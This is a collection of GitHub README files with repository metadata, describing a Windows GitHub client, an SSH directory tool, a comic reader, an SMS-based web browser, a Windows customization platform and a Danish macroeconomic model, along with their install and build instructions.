<p align="center"> <img width="128" align="center" src="assets/fluenthub.png" /> </p> <h1 align="center"> FluentHub </h1> <p align="center"> <a title="Microsoft Store" target="_blank" href="https://apps.microsoft.com/store/detail/fluenthub/9nkb9hx8rjz3"> <img width="220" align="center" src="https://get.microsoft.com/images/en-us%20dark.svg" /></a> </p> FluentHub is the stylish yet powerful GitHub client for Windows, which enpowers development experience and follows Microsoft Design Language. - **Modern UI:** designed with Fluent Design and built on WinAppSdk/WinUI - **Multitasking:** let's do multitasking with tabs, you can switch tabs without losing data - **Powerful page navigation:** navigation can be performed like browsers without losing navigation history - **Mutation:** perform any kind of modification on GitHub, the app supports as far as GitHub API supports ## ๐ŸŽ Getting started with FluentHub Your Windows must be Windows 10 or 11 to run FluentHub ### Via Microsoft Store This is the preferred installation method. It allows you to always be on the latest version when we release new builds via automatic updates. ### Via GitHub Released builds can be manually downloaded from this [repository's releases page](https://github.com/FluentHub/FluentHub/releases). Download the `FluentHub_<versionNumber>.msixbundle` file from the `Assets` section. In order to install the app, you can simply double-click on the .msixbundle file, and the app installer should automatically run. If that fails for any reason, you can try the following command with a PowerShell prompt: ```powershell # NOTE: If you are using PowerShell 7+, please run # Import-Module Appx -UseWindowsPowerShell # before using Add-AppxPackage. Add-AppxPackage FluentHub_<versionNumber>.msixbundle ``` ## Screenshots **Home page** ![image](https://github.com/0x5bfa/FluentHub/assets/62196528/a31bdace-8700-4a6a-83e9-1cdc52955c4f) **PR page** ![image](https://github.com/0x5bfa/FluentHub/assets/62196528/a29c4ef8-1fe5-47c3-be03-6afebe02c55b) **User profile page** ![image](https://github.com/0x5bfa/FluentHub/assets/62196528/35ffbe36-00d3-4d04-9019-67307febfc95) ## Building the Code ### Requirements - Windows 10 (Build 10.0.19041.0) or newer with Developer Mode enabled in the Windows Settings - [Git](https://git-scm.com/) - [Visual Studio 2022](https://visualstudio.microsoft.com/vs/): - [Windows App SDK (version 10.0.22621.0)](https://developer.microsoft.com/en-us/windows/downloads/windows-sdk/) - .NET 7 SDK (check the box named .NET Desktop Development) - Windows App SDK ### 1. Clone the repository ```git git clone https://github.com/FluentHub/FluentHub ``` ### 2. Prepare OAuth credentials See [the documentation](docs/credentials.md). > [!IMPORTANT] > If you skip this step, Visual Studio will give a fatal error that the `AppCredentials.config` file does not exist. ### 3. Build the project - Open `FluentHub.sln`. - Hit 'Set as Startup item' on `FluentHub.Package` in the Solution Explorer. - Build with `Debug`, `x64`, `FluentHub.Package`. ## Contributing There are multiple ways to participate in the community: - [Submit bugs and feature requests](https://github.com/FluentHub/FluentHub/issues/new/choose). - Review [the documentation](docs/code-style.md) and make pull requests for anything from typos to additional and new idea - Review source code changes If you are interested in fixing issues and contributing directly to the code base, please refer to the [documentation](docs/), which covers the following: - [How to build and run from source](docs/) - The development workflow, including debugging and running tests - Coding guidelines - [Submitting pull requests](https://github.com/FluentHub/FluentHub/pulls) - [Finding an issue to work on](https://github.com/FluentHub/FluentHub/issues/) - [Contributing to translations on Crowdin](https://crowdin.com/project/fluenthub) <a href="https://crowdin.com/project/fluenthub" rel="nofollow"> <img style="width:140;height:40" src="https://badges.crowdin.net/badge/dark/crowdin-on-light.png" /></a> ## Feedback - [Request a new feature](https://github.com/FluentHub/FluentHub/pulls) - Upvote popular feature requests - [File an issue](https://github.com/FluentHub/FluentHub/issues/new/choose) - Join [our Discord](https://discord.gg/8KtRkjq2Q4) and let us know what you think [![](https://dcbadge.vercel.app/api/server/8KtRkjq2Q4?style=flat)](https://discord.gg/8KtRkjq2Q4) ## Credit - Some application icons were created by [Icons8](https://github.com/icons8). - Many thanks to [Joseph Beattie](https://github.com/josephbeattie) for creating our current logo. ![Alt](https://repobeats.axiom.co/api/embed/15ef16427b681d911523e65d60d88a838c9d4fc3.svg "Repobeats analytics image")
The best, stylish yet powerful GitHub client for Windows.
github,uwp,graphql,client,developer-tools,csharp,xaml,fluent,github-api,mica
19
20
299
572
17
1
1
charmbracelet/wishlist
# Wishlist <p> <a href="https://github.com/charmbracelet/wishlist/releases"><img src="https://img.shields.io/github/release/charmbracelet/wishlist.svg" alt="Latest Release"></a> <a href="https://pkg.go.dev/github.com/charmbracelet/wishlist?tab=doc"><img src="https://godoc.org/github.com/golang/gddo?status.svg" alt="GoDoc"></a> <a href="https://github.com/charmbracelet/wishlist/actions"><img src="https://github.com/charmbracelet/wishlist/workflows/build/badge.svg" alt="Build Status"></a> <a href="https://nightly.link/charmbracelet/wishlist/workflows/nightly/main"><img src="https://shields.io/badge/-Nightly%20Builds-orange?logo=hackthebox&logoColor=fff&style=appveyor"/></a> </p> The SSH directory โœจ ![Gif](https://vhs.charm.sh/vhs-3YDAKLasKh7IgWNTkHKrHB.gif) With Wishlist you can have a single entry point for multiple SSH endpoints, whether they are [Wish](https://github.com/charmbracelet/wish) apps or not. As a server, it can be used to start multiple SSH apps within a single package and list them over SSH. You can list apps provided elsewhere, too. You can also use the `wishlist` command to list and connect to servers in your `~/.ssh/config` or in a YAML configuration file. ## Installation Use your fave package manager: ```bash # macOS or Linux brew install charmbracelet/tap/wishlist # Arch Linux (btw) yay -S wishlist-bin # or yay -S wishlist # Windows (with winget) winget install wishlist # Windows (with Scoop) scoop bucket add charm https://github.com/charmbracelet/scoop-bucket.git scoop install wishlist # Nix nix-env -iA nixpkgs.wishlist # Debian/Ubuntu sudo mkdir -p /etc/apt/keyrings curl -fsSL https://repo.charm.sh/apt/gpg.key | sudo gpg --dearmor -o /etc/apt/keyrings/charm.gpg echo "deb [signed-by=/etc/apt/keyrings/charm.gpg] https://repo.charm.sh/apt/ * *" | sudo tee /etc/apt/sources.list.d/charm.list sudo apt update && sudo apt install wishlist # Fedora/RHEL echo '[charm] name=Charm baseurl=https://repo.charm.sh/yum/ enabled=1 gpgcheck=1 gpgkey=https://repo.charm.sh/yum/gpg.key' | sudo tee /etc/yum.repos.d/charm.repo sudo yum install wishlist ``` Or download a pre-compiled binary or package from the [releases][releases] page. Or just build it yourself (requires Go 1.19+): ```bash git clone https://github.com/charmbracelet/wishlist.git cd wishlist go build ./cmd/wishlist/ ``` [releases]: https://github.com/charmbracelet/wishlist/releases ## Usage ### CLI #### Remote If you just want a directory of existing servers, you can use the `wishlist` CLI and a YAML config file. You can also just run it without any arguments to list the servers in your `~/.ssh/config`. To start wishlist in server mode, you'll need to use the `serve` subcommand: ```sh wishlist serve ``` Check the [example config file](/_example/config.yaml) file as well as `wishlist server --help` for details. #### Local If you want to explore your `~/.ssh/config`, you can run wishlist in local mode with: ```sh wishlist ``` Note that not all options are supported at this moment. Check the [commented example config](/_example/config) for reference. ### Library Wishlist is also available as a library, which allows you to start several apps within the same process. Check out the `_example` folder for a working example. ## Auth ### Local mode When running in local mode, wishlist will first see if the current endpoint has an `IdentityFile` specified. If so, it'll try to use that. If not, it'll see if there's a SSH Agent available, and use it. Otherwise, it'll try the common key names in `~/.ssh`. ### Server mode When running as a server, wishlist will first try to forward the current SSH Agent. If there's no agent, it'll create or use an existing ed25519 key present in `.wishlist/client_ed25519`. Password authentication is not supported at this moment. ### Agent forwarding example ```sh eval (ssh-agent) ssh-add -k # adds all your pubkeys ssh-add -l # should list the added keys ssh \ -o 'ForwardAgent=yes' \ # forwards the agent -o 'UserKnownHostsFile=/dev/null' \ # do not add to ~/.ssh/known_hosts, optional -p 2222 \ # port foo.bar \ # host -t list # optional, app name ``` You can also add this to your `~/.ssh/config`, for instance: ```sshconfig Host wishlist HostName foo.bar Port 2222 ForwardAgent yes UserKnownHostsFile /dev/null ``` ## Discovery Wishlist can discover endpoints using Zeroconf, SRV Records, and [Tailscale][]. You can find a brief explanation and examples of all of them bellow. Run `wishlist --help` to see all the options. [Tailscale]: http://tailscale.com ### Tailscale You can configure Wishlist to find all nodes in your **tailnet** and add them as endpoints: ```bash wishlist --tailscale.net=your_tailnet_name --tailscale.key=tskey-api-abc123... ``` You can use the [Hints](#hints) to change the connection settings. #### OAuth authentication Tailscale API keys expire after 90 days. If you want something that doesn't require you to intervene every couple of months, use OAuth Clients: Create a client [here](https://login.tailscale.com/admin/settings/oauth). The only scope needed is `devices:read`. Instead of using `--tailscale.key` (or `$TAILSCALE_KEY`), set `--tailscale.client.id` and `--tailscale.client.secret` (or `$TAILSCALE_CLIENT_ID` and `$TAILSCALE_CLIENT_SECRET`, respectively). ### Zeroconf/Avahi/mDNS/Bonjour You can enable this using the `--zeroconf.enabled` flag: ```bash wishlist --zeroconf.enabled ``` Optionally, you can also specify a timeout with `--zeroconf.timeout` and, which domain to look for with `--zeroconf.domain`. Wishlist will look for `_ssh._tcp` services in the given domain. You can use the [Hints](#hints) to change the connection settings. ### SRV records You can set Wishlist up to find nodes from DNS `SRV` records: ```bash wishlist --srv.domain example.com ``` By default, Wishlist will set the name of the endpoint to the `SRV` target. You can, however, customize that with a `TXT` record in the following format: ```txt wishlist.name full.address:22=thename ``` So, in this case, a `SRV` record pointing to `full.address` on port `22` will get the name `thename`. ### Hints You can use the `hints` key in the YAML configuration file to hint settings into discovered endpoints. Check the [example configuration file](/_example/config.yaml) to learn what options are available. If you're using a SSH configuration file as the Wishlist configuration file, it'll try to match the hosts with the rules in the given configuration. Otherwise, the services will simply be added to the list. The difference is that if a hints themselves won't show in the TUI, as of hosts in the SSH configuration will. ## Running it Wishlist will read and store all its information in a `.wishlist` folder in the current working directory: - the server keys - the client keys - known hosts - config files Config files may be provided in either YAML or SSH Config formats: - [example YAML](/_example/config.yaml) - [example SSH config](/_example/config) The config files are tried in the following order: - the `-config` flag in either YAML or SSH config formats - `.wishlist/config.yaml` - `.wishlist/config.yml` - `.wishlist/config` - `[[user config dir]]/wishlist/config.yaml`[^1] - `[[user config dir]]/wishlist/config.yml`[^1] - `[[user config dir]]/wishlist/config`[^1] - `$HOME/.ssh/config` - `/etc/ssh/ssh_config` [^1]: i.e. `[[user config dir]]`: On Unix systems, it will be `$XDG_CONFIG_HOME` as specified by https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html if non-empty, else `$HOME/.config`. On Darwin, it will be `$HOME/Library/Application Support`. On Windows, it will be `%AppData%`. On Plan 9, it will be `$home/lib`. The first one that is loaded and parsed without errors will be used. This means that if you have your common used hosts in your `~/.ssh/config`, you can simply run `wishlist` and get it running right away. It also means that if you don't want that, you can pass a path to `-config`, and it can be either a YAML, or a SSH config file. ### Using the binary ```sh wishlist ``` ### Using Docker ```sh mkdir .wishlist $EDITOR .wishlist/config.yaml # either an YAML or a SSH config docker run \ -p 2222:22 \ -v $PWD/.wishlist:/.wishlist \ docker.io/charmcli/wishlist:latest ``` ### Supported SSH Options Not all SSH options are currently supported. Here's a list of the ones that are: - `User` - `Hostname` - `Port` - `IdentityFiles` - `ForwardAgent` - `RequestTTY` - `RemoteCommand` - `SendEnv` - `SetEnv` - `ConnectTimeout` - `Include` - `PreferredAuthentications` - `ProxyJump` ## Acknowledgments The gif above shows a lot of [Maas Lalaniโ€™s](https://github.com/maaslalani) [confeTTY](https://github.com/maaslalani/confetty). ## Feedback Weโ€™d love to hear your thoughts on this project. Feel free to drop us a note! - [Twitter](https://twitter.com/charmcli) - [The Fediverse](https://mastodon.social/@charmcli) - [Discord](https://charm.sh/chat) ## License [MIT](/LICENSE) --- Part of [Charm](https://charm.sh). <a href="https://charm.sh/"><img alt="The Charm logo" src="https://stuff.charm.sh/charm-badge.jpg" width="400"></a> <!--prettier-ignore--> Charm็ƒญ็ˆฑๅผ€ๆบ โ€ข Charm loves open source
The SSH directory โœจ
hacktoberfest,ssh
20
15
253
358
8
2
5
niuhuan/daisy
daisy ===== [![license](https://img.shields.io/github/license/niuhuan/daisy)](https://raw.githubusercontent.com/niuhuan/daisy/master/LICENSE) [![releases](https://img.shields.io/github/v/release/niuhuan/daisy)](https://github.com/niuhuan/daisy/releases) [![downloads](https://img.shields.io/github/downloads/niuhuan/daisy/total)](https://github.com/niuhuan/daisy/releases) ไธ€ไธช็ฎ€ๆดๅคงๆ–น็š„ๆผซ็”ปไธŽ่ฝปๅฐ่ฏดๅฎขๆˆท็ซฏ, ๅŒๆ—ถๆ”ฏๆŒๆ”ฏๆŒ Android / iOS / MacOS / Windows / Linux. ๆญคAPPๅซๆœ‰"ๅธ็ƒŸ/้ฅฎ้…’/ๆ–—ๆฎด/่จ€ๆƒ…/ไธคๆ€ง"็ญ‰ๅ†…ๅฎนๆˆ–้—ดๆŽฅๆ€งๆ่ฟฐ, ๅ› ๆญค้™ๅˆถ็บงๅˆซไธบ"R12+PG14"๏ผŒๅปบ่ฎฎๅœจ12ๅฒไปฅไธŠๆ‰่ƒฝไฝฟ็”จ, 14ๅฒไปฅไธ‹็š„็”จๆˆทๅœจ็›‘ๆŠคไบบ้™ชๅŒไธ‹ไฝฟ็”จ๏ผŒๅนถ่ฏทๅœจไฝฟ็”จ่ฟ‡็จ‹ไธญ้ตๅฎˆๅฝ“ๅœฐๆณ•ๅพ‹ๆณ•่ง„ใ€‚ ๅฆ‚ๆžœๆ‚จ่ง‰ๅพ—ๆญค่ฝฏไปถๅฏนๆ‚จๆœ‰ๅธฎๅŠฉ๏ผŒๅฏไปฅstar่ฟ›่กŒๆ”ฏๆŒใ€‚ๅŒๆ—ถๆฌข่ฟŽๆ‚จissue๏ผŒไธ€่ตท่ฎฉ่ฝฏไปถๅ˜ๅพ—ๆ›ดๅฅฝใ€‚ ไป“ๅบ“ๅœฐๅ€ https://github.com/niuhuan/daisy ## ่ฝฏไปถๆˆชๅ›พ ![](images/st01.png) ![](images/st02.png) ![](images/st03.jpg) ![](images/st04.jpg) ## ๆŠ€ๆœฏๆžถๆž„ ๅฎขๆˆท็ซฏไฝฟ็”จๅ‰ๅŽ็ซฏๅˆ†็ฆปๆžถๆž„, flutterไฝœไธบๆธฒๆŸ“ๆก†ๆžถ. rustไฝœไธบๅบ•ๅฑ‚่ฐƒๅบฆ็ฝ‘็ปœๅ’Œๆ–‡ไปถ็ณป็ปŸ. FlutterไธŽrustๅ‡ไธบ่ทจๅนณๅฐ็ผ–็จ‹่ฏญ่จ€, ไปฅๆญคๆ”ฏๆŒ android/iOS/windows/macOS ็ญ‰ไธๅŒๆ“ไฝœ็ณป็ปŸ. ![](https://raw.githubusercontent.com/fzyzcjy/flutter_rust_bridge/master/book/logo.png)
็พŽ่ง‚ๆ˜“็”จไธ”ๆ— ๅนฟๅ‘Š็š„ๆผซ็”ปๅ’Œ่ฝปๅฐ่ฏดๅฎขๆˆท็ซฏ, ๅŒๆ—ถๆ”ฏๆŒMacOS๏ผŒWindows๏ผŒAndroid๏ผŒiOSใ€‚็ฑปไผผๅŠจๆผซไน‹ๅฎถใ€‚
android,anime,bika,comic,comics-reader,flutter,pika,rust
29
2
1
89
8
1
1
lukeaschenbrenner/TxtNet-Browser
# TxtNet Browser ### Browse the Web over SMS, no WiFi or Mobile Data required! <p align="center"><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/app/src/main/ic_launcher-playstore.png" alt="App Icon" width="200"/></p> > **โธ๏ธ Development of this project is currently on hiatus due to other ongoing commitments. However, fixes and improvements are planned when development continues in Q1 2024! โธ๏ธ** TextNet Browser is an Android app that allows anyone around the world to browse the web without a mobile data connection! It uses SMS as a medium of transmitting HTTP requests to a server where a pre-parsed HTML response is compressed using Google's [Brotli](https://github.com/google/brotli) compression algorithm and encoded using a custom Base-114 encoding format (based on [Basest](https://github.com/saxbophone/basest-python)). In addition, any user can act as a server using their own phone's primary phone number and a Wi-Fi/data connection at the press of a button, allowing for peer-to-peer distributed networks. ## Download ### See the **[releases page](https://github.com/lukeaschenbrenner/TxtNet-Browser/releases)** for an APK download of the TxtNet Browser client. A Google Play release is coming soon. TxtNet Browser is currently compatible with Android 4.4-13+. ## Running Server Instances (uptime not guaranteed) | Country | Phone Number | Notes | | :--- | :----: | :--- | | United States | +1(913)203-2719 | Supports SMS to all +1 (US/Canada) numbers in addition to [these countries](https://github.com/lukeaschenbrenner/TxtNet-Browser/issues/2#issuecomment-1510506701) | | | | | Let me know if you are interested in hosting a server instance for your area! > โš ๏ธ**Please note**: All web traffic should be considered unencrypted, as all requests are made over SMS and received in plaintext by the server! ## How it works (client) This app uses a permission that allows a broadcast reciever to recieve and parse incoming SMS messages without the need for the app to be registered as the user's default messaging app. While granting an app SMS permissions poses a security concern, the code for this app is open source and all code involving the use of internet permissions are compartamentalized to the server module. This ensures that unless the app is setup to be a server, no internet traffic is transmitted. In addition, as the client, SMS messages are only programatically sent to and recieved from a registered server phone number. The app communicates with a "server phone number", which is a phone number controlled by a "server host" that communicates directly over SMS using Android's SMS APIs. Each URL request is sent, encoded in a custom base 114, to the server. Usually, this only requires 1 SMS, but just in case, each message is prepended with an order specifier. When the server receives a request, the server uses an Android WebView component to programatically request the website in a manner that simulates a regular request, to avoid restrictions some services (such as Cloudflare) place on HTTP clients. By doing this, any Javascript can also execute on the website, allowing content to be dynamically loaded into the HTML if needed. Once the page is loaded, only the HTML is transferred back to the recipient device. The HTML is stripped of unnecessary tags and attributes, compressed into raw bytes, and then encoded. Once encoded, the messages are split into 160 character numbered segments (maximizing the [GSM-7 standard](https://en.wikipedia.org/wiki/GSM_03.38) SMS size) and sent to the client app for parsing and displaying. Side note: Compression savings have been estimated to be an average of 20% using Brotli, but oftentimes it can save much more! For example, the website `example.com` in stripped HTML is 285 characters, but only requires 2 SMS messages (189 characters) to receive. Even including the 225% overhead in data transmission, it is still more efficient! #### Why encode the HTML in the first place? SMS was created in 1984, and was created to utilize the extra bytes from the data channels in phone signalling. It was originally conceived to only support 128 characters in a 7-bit alphabet. When further characters were required to support a subset of the UTF-8 character set, a new standard called UCS-2 was created. Still limited by the 160 bytes available, UCS-2 supports more characters (many of which show up in HTML documents) but limits SMS sizes to 70 characters per SMS. By encoding all data in GSM-7, more data can be sent per SMS message than sending the raw HTML over SMS. It is possible that it may be even more efficient to create an encoding system using all the characters available in UCS-2, but this limits compatibility and is out of the scope of the project. ## Server Hosting TxtNet Browser has been rewritten to include a built-in server hosting option inside the app. Instead of the now-deprecated Python server using a paid SMS API, any user can now act as a server host, allowing for distributed communication. To enable the background service, tap on the overflow menu and select "TxtNet Server Hosting". Once the necessary permissions are granted, you can press on the "Start Service" toggle to initialize a background service. TxtNet Server uses your primary mobile number associated with the active carrier subscription SIM as a number that others can add and connect to. Please note that this feature is still in early stages of development and likely has many issues. Please submit issue reports for any problems you encounter. For Android 4.4-6.0, you will need to run adb commands one time as specified in the app. For Android 6.0-10.0, you may also use Skizuku, but a PC will still be required once. For Android 11+, no PC is required to activate the server using [Shizuku](https://shizuku.rikka.app/guide/setup/). ##### Desktop Server Installation (Deprecated) <strike> The current source code is pointed at my own server, using a Twilio API with credits I have purchased. If you would like to run your own server, follow the instructions below: 1. Register for an account at [Twilio](https://twilio.com/), purchase a toll-free number with SMS capability, and purchase credits. (This project will not work with Twilio free accounts) 2. Create a Twilio application for the number. 3. Sign up for an [ngrok](http://ngrok.com/) account and download the ngrok application 4. Open the ngrok directory and run this command: `./ngrok tcp 5000` 5. Visit the [active numbers](https://console.twilio.com/US1/develop/phone-numbers/manage/incoming) page and add the ngrok url to the "A Message Comes In" section after selecting "webhook". For example: "https://xyz.ngrok.io/receive_sms" 6. Download the TxtNet Browser [server script](https://github.com/lukeaschenbrenner/TxtNet-Browser/blob/master/SMS_Server_Twilio.py) and install all the required modules using "pip install x" 7. Add your Twilio API ID and Key into your environment variables, and run the script! `python3 ./SMS_Server_Twilio.py` 8. In the TxtNet Browser app, press the three dots and press "Change Server Phone Number". Enter in the phone number you purchased from Twilio and press OK! </strike> ## FAQ/Troubleshooting Bugs: - Many carriers are unnecessarily rate limiting incoming text messages, so a page may look as though it "stalled" while loading on large pages. As of now the only way to fix this is to wait! - In congested networks, it's possible for a mobile carrier to drop one or more SMS messages before they are recieved by the client. Currently, the app has no logic to mitigate this issue, so any websites that have stalled for a significant amount of time should be requested again. - In Android 12 (or possibly a new version of Google Messages?), there is a new and "improved" messages blocking feature. This results in no SMS messages getting through when a number is blocked, which makes the blocking feature of TxtNet Browser break the app! Instead of blocking messages, to get around this "feature", you can silent message notifications from the server phone number. <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/silentMessages.png" alt="Silence Number" width="200"/> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/Messages_Migrating_Popup.png" alt="Contacts Popup" width="200"/> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/MigratingBlockedContacts.png" alt="Migrating Contacts" width="200"/> ## Screenshots (TxtNet 1.0) <table> <tr> <td> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot1.png" alt="1" height = 640px ></td> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot2.png" alt="2" height = 640px></td> </tr> <tr> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot3.png" alt="3" height = 640px></td> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot4.png" align="right" alt="4" height = 640px> </td> </tr> </table> ##### Demo (TxtNet 1.0) https://user-images.githubusercontent.com/5207700/191133921-ee39c87a-c817-4dde-b522-cb52e7bf793b.mp4 > Demo video shown above ## Development ### ๐Ÿšง **If you are skilled in Android UI design, your help would be greatly appreciated!** ๐Ÿšง A consistent theme and dark mode would be great additions to this app. Feel free to submit pull requests! I am a second-year CS student with basic knowledge of Android Development and Server Development, and greatly appreciate help and support from the community. ## Future Impact My long-term goal with this project is to eventually reach communities where such a service would be practically useful, which may include: - Those in countries with a low median income and prohibitively expensive data plans - Those who live under oppressive governments, with near impenetrable internet censorship If you think you might be able to help funding a local country code phone number or server, or have any other ideas, please get in contact with the email in my profile description! ## License GPLv3 - See LICENSE.md ## Credits Thank you to everyone who has contributed to the libraries used by this app, especially Brotli and Basest. Special thanks goes to [Coldsauce](https://github.com/ColdSauce), whose original project [Cosmos Browser](https://github.com/ColdSauce/CosmosBrowserAndroid) was the original inspiration for this project! My original reply to his Hacker News comment is [here](https://news.ycombinator.com/item?id=30685223#30687202). In addition, I would like to thank [Zachary Wander](https://www.xda-developers.com/implementing-shizuku/) from XDA for their excellent Shizuku implementation tutorial and [Aayush Atharva](https://github.com/hyperxpro/Brotli4j/) for the amazing foundation they created with Brotli4J, allowing for a streamlined forking process to create the library BrotliDroid used in this app.
An app that lets you browse the web over SMS
null
10
4
4
82
12
3
0
ramensoftware/windhawk
# Windhawk Windhawk aims to make it easier to customize Windows programs. For more details, see [the official website](https://windhawk.net/) and [the announcement](https://ramensoftware.com/windhawk). This repository is used to [report issues](https://github.com/ramensoftware/windhawk/issues) and to [discuss Windhawk](https://github.com/ramensoftware/windhawk/discussions). For discussing Windhawk mods, refer to [the windhawk-mods repository](https://github.com/ramensoftware/windhawk-mods). You're also welcome to join [the Windhawk Discord channel](https://discord.gg/WZgXScMud7) for a live discussion. ## Technical details High level architecture: ![High level architecture diagram](diagram.png) For technical details about the global injection and hooking method that is used, refer to the following blog post: [Implementing Global Injection and Hooking in Windows](https://m417z.com/Implementing-Global-Injection-and-Hooking-in-Windows/). ## Source code The Windhawk source code can be found in the `src` folder, which contains the following subfolders: * `windhawk`: The code of the main `windhawk.exe` executable and the 32-bit and 64-bit `windhawk.dll` engine libraries. * `vscode-windhawk`: The code of the VSCode extension that is responsible for UI operations such as installing mods and listing installed mods. * `vscode-windhawk-ui`: The UI part of the VSCode extension. A simple way to get started is by extracting the portable version of Windhawk with the official installer, building the part of Windhawk that you want to modify, and then replacing the corresponding files in the portable version with the newly built files. ## Additional resources Code which demonstrates the global injection and hooking method that is used can be found in this repository: [global-inject-demo](https://github.com/m417z/global-inject-demo).
The customization marketplace for Windows programs: https://windhawk.net/
null
10
1
3
7
34
1
0
DREAM-DK/MAKRO
# MAKRO 2023-March MAKRO is an economic model built to provide a good description of the Danish economy in both the short and the long run. In addition, the model is used to analyze how economic policy initiatives affect the economy, including the gradual transition to a long-run path. The model is developed by the MAKRO model group at [DREAM (Danish Research Institute for Economic Analysis and Modelling )](https://dreamgruppen.dk/) for use by the Danish Ministry of Finance and others. The model parameters, equations, and data as a whole have been selected such that the short and long-run properties are as empirically and theoretically well-founded as possible. Any changes to parameters, equations, or data are solely the user's responsibility, and we request that any changes be explicitly presented in any publication using MAKRO. ## 2023-March version This is the first publicly available non-beta release of MAKRO. It comes with batteries in the form of a stylized baseline starting in 2029, so users can simulate marginal policy experiments without requiring a data subscription or calibrating the model. Note that the stylized baseline is not a serious forecast of the Danish economy but is based on several simplified projection assumptions. As such, the baseline should only be used for marginal experiments rather than as a forecast on its own. ## Documentation The model documentation in English is included in this repository under [Documentation/Documentation.pdf](Documentation/Documentation.pdf). The documentation has been thoroughly improved and pruned for this release, and we highly recommend reading it! Variable names and documentation in the code are in Danish; however, comments regarding the structure of the code are in English for anyone looking for a template on how to structure a large model. ## Model source code The source code defining all the model equations can be found in the [model subdirectory](Model/). The run.cmd shows the order in which the files are usually run. ### Modules The model is split into several modules, each defining a group of endogenous variables and exactly as many constraints. The separation is purely for user convenience rather than technical, as, in the end, all the modules are solved simultaneously. - [aggregates](Model/aggregates.gms) - Calculates objects with ties to many other modules - [consumers](Model/consumers.gms) - Consumption decisions and budget constraint - [exports](Model/exports.gms) - Armington demand for exports of both domestically produced and imported goods - [finance](Model/finance.gms) - Firm financing and valuation - [government](Model/government.gms) - Government aggregation module - [GovRevenues](Model/GovRevenues.gms) - Government revenues (see also taxes module) - [GovExpenses](Model/GovExpenses.gms) - Government expenses - [HHincome](Model/HHincome.gms) - Household income and portfolio accounting - [IO](Model/IO.gms) - Details of the IO system. The different demand components are satisfied with domestic production competing with imports - [labor_market](Model/labor_market.gms) - Labor force participation, job searching and matching, and wage bargaining - [pricing](Model/pricing.gms) - Price rigidities, markups, and foreign prices - [production_private](Model/production_private.gms) Private sector production and demand for factors of production - [production_public](Model/production_public.gms) Public sector production and demand for factors of production - [struk](Model/struk.gms) - Structural levels, i.e. potential output (Gross Value Added) and structural employment - [taxes](Model/taxes.gms) - Tax rates and revenues from taxes and duties closely related to the IO system ## GAMS and gamY MAKRO is written in GAMS but uses a pre-processor, *gamY*, that implements additional features convenient for working with large models. An installation of [GAMS](https://www.gams.com/) is needed to run MAKRO (we recommend using the latest version) as well as a license for both GAMS and the included Conopt4 solver. Note that students and academics may have access to a license through their university. The [paths.cmd](paths.cmd) file should be adjusted with the path to your local GAMS installation. We generally assume that users use Windows, but both GAMS and MAKRO should be compatible with other operating systems - python files are typically included as alternatives to .cmd files. gamY can be run as a stand-alone executable or as a python script - both are included in the [*gamY* subdirectory](gamY/). The [documentation for gamY](gamY/gamY.pdf) is also included. ## Text editor The recommended text editor for working with gamY is [Sublime Text 3](https://www.sublimetext.com/3), where the [gamY sublime package](https://packagecontrol.io/packages/gamY) provides syntax highlighting. In addition, Sublime can be opened using the [MAKRO.sublime-project](MAKRO.sublime-project) project file, which is set up for better search in sub-directories etc. ## Running shocks The [Analysis/Standard_shocks](Analysis/Standard_shocks) subdirectory contains files for running a large number of pre-defined shocks, and it is straightforward to disable existing shocks and add new custom shocks instead. This is done by editing [standard_shocks.gms](Analysis/Standard_shocks/standard_shocks.gms). The run file, [Analysis/Standard_shocks/run.cmd](Analysis/Standard_shocks/run.cmd), is set up to run this file, followed by two python reporting files. For reporting on responses to shocks, we include a python script, [plot_standard_shocks.py](Analysis/Standard_shocks/plot_standard_shocks.py), for making a combined report with many plots of responses to one or more shocks, comparing shock responses from one or more model versions, and/or multiple variations of the same shock. Shocks to be plottet can be added inside (shocks_to_plot.py)[shocks_to_plot.py] and [variables_to_plot.py](variables_to_plot.py) controls which variables are plotted. [plot_shocks.py](Analysis/Standard_shocks/plot_shocks.py) is set up for making many detailed figures that illustrate the effects of a particular shock (without comparison between model versions or shock variations). ## Python packages For reporting, and other purposes, we make use of several python packages that can be installed using pip: ``` pip install dream-tools plotly numpy pandas scipy==1.8.1 statsmodels xlwings kaleido==0.1.0.post1 xhtml2pdf IPython ``` We also require the GAMS API package, which cannot be installed with pip. Installation instructions are found here: https://www.gams.com/latest/docs/API_PY_GETTING_STARTED.html .
null
null
1
4
7
25
2
2
0
1n7erface/Template
